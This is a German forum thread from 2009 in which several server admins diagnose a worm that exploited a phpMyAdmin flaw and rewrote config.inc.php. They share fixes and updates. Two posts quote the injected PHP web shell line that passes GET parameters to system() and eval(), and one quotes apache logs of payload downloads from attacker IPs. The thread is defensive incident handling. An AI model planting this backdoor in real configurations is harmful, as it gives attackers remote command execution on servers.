Nach Wochenende kein Zugriff mehr auf phpmyadmin... Debian 5 + ISPconfig3

[gbit]

Guten Tag,

ich habe ein Problem, was mir die letzten nerven raubt...
Ich habe mir aufn Homeserver Debian 5 installiert mit ISPconfig3 von diesem Tutorial:

Der Perfekte Server - Debian Lenny (Debian 5.0) [ISPConfig 3]

Es lief auch alles absolut super, keine Fehler und letztendlich lief auch alles!
Der Server lief jetzt auch seit 3 Wochen ohne Probleme und am Freitag habe ich sogar noch mit phpmyadmin gearbeitet, doch seit Heute Morgen geht garnix mehr, sobald ich phpmyadmin aufrufe, spuckt mir apache nur folgendes aus:

Willkommen bei phpMyAdmin 2.11.8.1deb5

phpMyAdmin hat versucht eine Verbindung zum MySQL-Server aufzubauen, jedoch hat dieser die Verbindung zurückgewiesen. Sie sollten Ihre Einstellungen für Host, Benutzername und Passwort in Ihrer config.inc.php überprüfen und sich vergewissern, dass diese den Informationen, welche Sie vom Administrator erhalten haben, entsprechen.
Fehler

MySQL meldet: Dokumentation
#1045 - Access denied for user 'root'@'localhost' (using password: NO)
Ungültiger Host-Name für Server 1. Bitte überprüfen Sie Ihre Konfiguration.

Ich habe nichts dran gemacht, ich habe auch schon alle möglichen configs von ISPconfig3 oder phpmyadmin durchforstet, jedoch steht überall immer nur localhost bei hostname ( was ja eigentlich stimmen müsste?! )
Ein Update von mysql o. phpmyadmin hat mir ISPconfig auch nicht angezeigt...

Was mache ich bloß falsch, das es zum verrecken nicht mehr klappen will?
Ach ja, der login über shell ins mysql per root account klappt wunderbar... Und Fremdeinwirkung kann ich auch sofort ausschließen...

 

[sebastianh]

Gut zu wissen, scheint so das ich mich doch nicht blöd anstelle. Ich habe das selbe Problemm. Jedoch habe ich noch keine Zeit gefunden um zu schauen an was das liegt. Das Problemm ist bei mir seit Donnerstag oder Freitag (glaub ich)

.:EDIT:.
So, habe gerade mal geschaut, also bei mir lag der fehler in der "config.inc.php" von phpmyadmin.
Anscheinend wurde die am 11.06 bei mir verändert, kommt also mit dem Tag wie oben schon erwähnt hin.
der wert für [auth_type] wurde auf 'config' geändert. Habe Ihn wieder auf 'cookie' geändert.
In der Zeile für [host], war dieser aus kommentiert und es stand ein "phpinfo();" da....

Aber Warum?.... Keine Ahnung!

 

[Till]

Könnte das Problem hier sein:

http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/

Zumindest meinte das jemand im en Forum, der ein ähnliches Problem hat.

 

[gbit]

Danke für die Antworten!

@sebastianh, ich habe nochmal meine config.inc.php von phpmyadmin durchforstet, lustigerweise wurde bei mir [auth_type] nicht verändert! Allerdings wurde bei mir komplett die Zeile [host] rausgelöscht... Nachdem ich Sie dann wieder eingetragen hatte, hat wieder alles gefunzt *puh*

Ob das mit dem PoC zusammenhängt müsste ich mal gucken, allerdings ist mir keinerlei direkt Ausgabe von Systemdaten über die config aufgefallen

grüße, gbit!

 

[rutziste]

hatte das selbe problem. habe die datei config.inc.php im verzeichnis /var/lib/phpmyadmin gelöscht und es funktioniert wieder. würde mich aber sehr interessieren wie das zu stande gekommen ist.

die datei wurde am 16 juni 2009 erstellt um 00:52

achso noch die info ich verwende die letzte ispconfig auf debian lenny.

mfg

 

[Till]

ispconfig schreibt oder ändert die datei nicht, es muss also durch einen anderen prozess geändert worden sein.

 

[e1l52]

Gleiches Problem bei mir. /var/lib/phpmyadmin/config.inc.php wurde am 20.6. verändert. Der wert für [auth_type] stand auf 'config' . Habe Ihn wieder auf 'cookie' geändert. Seitdem läufts wieder.

Keine Ahnung wodurch die Änderung erfolgt ist.

 

[jogy]

Also wer jetzt etwa pingelig ist (so wie ich), der sieht immer noch im /phpmyadmin eine Fehlermeldung unter dem Login-Feld:

Ungültiger Host-Name für Server 1. Bitte überprüfen Sie Ihre Konfiguration.

Ich habe in der /var/lib/phpmyadmin/config.inc.php folgende Änderung gemacht:

Zeile 14 aukommentiert:

/* $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost'; */

Und dafür eingefügt:

$cfg['Servers'][$i]['host']='localhost';

 

[rutziste]

So wens wer gans genau wissen will. habe gestern mal schnell in einer vm ein neues ispcofig installiert. und da steht in der config.inc.php überhaupt nichts drinnen. also eine leere datei.

also ruhig alles löschen was da drinnen steht und es funktioniert wieder.
dann noch die berechtigung 660 auf 640 drehen.

mfg

 

[jogy]

Stimmt: Habe die config.inc.php mal umbenannt. Jetzt läufts auch ohne Probleme. Tja, weniger ist manchmal eben mehr.

 

[Till]

Mehr Infos dazu hier: Scheint ein Wurm zu sein, der sich aif phpmyadmin spezialisiert hat:

http://www.howtoforge.com/forums/showthread.php?t=36418&page=3

 

[jogy]

Wurmkur fällig!

Die Sicherheitslücke wurde beseitigt. Abhilfe schafft ein apt-get update && apt-get upgrade. (Da denkt man, man sei sicher...)

 

[Falcon37]

Für Debian gibt es seit heute ein Update, würde unbedingt jeden empfehlen sofort zu updaten!!

 

[jogy]

Mich würde mal interessieren, wie es dem Exploit möglich war, in den Rootbereich des Servers zu gelangen.

 

[jogy]

Ich will ja nicht bange machen, aber durch den Exploit konnten beliebige root Befehle ausgeführt werden. Konsequenter Weise müßte der Server jetzt neu aufgesetzt werden.
http://www.informatikserver.at/inde...heitsluecke-in-phpmyadmin-bedroht-ihre-server
http://www.userlinux.net/en/new-phpmyadmin-exploit.html
http://www.tecchannel.de/sicherheit/news/2019939/mindestens_zwei_exploits_fuer_phpmyadmin_im_umlauf/

 

[Falcon37]

Wie kann ich phpmyadmin eigentlich "nicht öffentlich" gestalten? Also z.B. mit .hctaccess etc. schützen...

 

[Till]

Wie Du vorgeschlagen hast, eine .htaccess davor legen.

 

[h4nnib4l123]

Habe folgenden Code in der config.inc.php vorgefunden

$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo  '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo  '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';

Naja da wird wohl wieder eine neu-installation anstehen

 

[jogy]

Schau doch erst einmal in Deine /var/log/apache2/error.log
Hast Du da solche oder ähnliche Einträge?

---------------------snip
--2009-06-23 18:57:49-- http://xxx.xxx.xxx.xxx/psy.tgz
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 592964 (579K) [application/x-gzip]
Saving to: `psy.tgz'

0K .......... .......... .......... .......... .......... 8% 130K 4s
50K .......... .......... .......... .......... .......... 17% 114K 4s
100K .......... .......... .......... .......... .......... 25% 123K 4s
150K .......... .......... .......... .......... .......... 34% 117K 3s
200K .......... .......... .......... .......... .......... 43% 125K 3s
250K .......... .......... .......... .......... .......... 51% 118K 2s
300K .......... .......... .......... .......... .......... 60% 123K 2s
350K .......... .......... .......... .......... .......... 69% 118K 1s
400K .......... .......... .......... .......... .......... 77% 116K 1s
450K .......... .......... .......... .......... .......... 86% 125K 1s
500K .......... .......... .......... .......... .......... 94% 122K 0s
550K .......... .......... ......... 100% 110K=4.8s

2009-06-23 18:57:54 (120 KB/s) - `psy.tgz' saved [592964/592964]

--2009-06-23 19:00:56-- http://xxx.xxx.xxx.xxx/ba.tgz
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 493611 (482K) [application/x-gzip]
Saving to: `ba.tgz'

0K .......... .......... .......... .......... .......... 10% 130K 3s
50K .......... .......... .......... .......... .......... 20% 117K 3s
100K .......... .......... .......... .......... .......... 31% 118K 3s
150K .......... .......... .......... .......... .......... 41% 118K 2s
200K .......... .......... .......... .......... .......... 51% 125K 2s
250K .......... .......... .......... .......... .......... 62% 122K 1s
300K .......... .......... .......... .......... .......... 72% 115K 1s
350K .......... .......... .......... .......... .......... 82% 116K 1s
400K .......... .......... .......... .......... .......... 93% 114K 0s
450K .......... .......... .......... .. 100% 141K=4.0s

2009-06-23 19:01:00 (121 KB/s) - `ba.tgz' saved [493611/493611]

--2009-06-23 19:01:00-- http://xxx.xxx.xxx.xxx/time.set
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5542 (5.4K) [text/plain]
Saving to: `time.set'

0K ..... 100% 140K=0.04s

2009-06-23 19:01:00 (140 KB/s) - `time.set' saved [5542/5542]

./run: line 4: ./httpd: No such file or directory
------------------------- snip

 

[h4nnib4l123]

Folgendes konnte ich einmalig ausfindig machen:

--2009-06-20 19:00:04-- http://188.24.51.XXX/50.txt
Connecting to 188.24.51.XXX:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17838 (17K) [text/plain]
Saving to: `/tmp/50.txt'

0K .......... ....... 100% 131K=0.1s

2009-06-20 19:00:04 (131 KB/s) - `/tmp/50.txt' saved [17838/17838]

kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Die 50.txt ist leider nichtmehr über den obigen Server erreich-/einsehbar.
ein "find /* -name 50.txt" auf meinem Server brachte auch keinen Erfolg.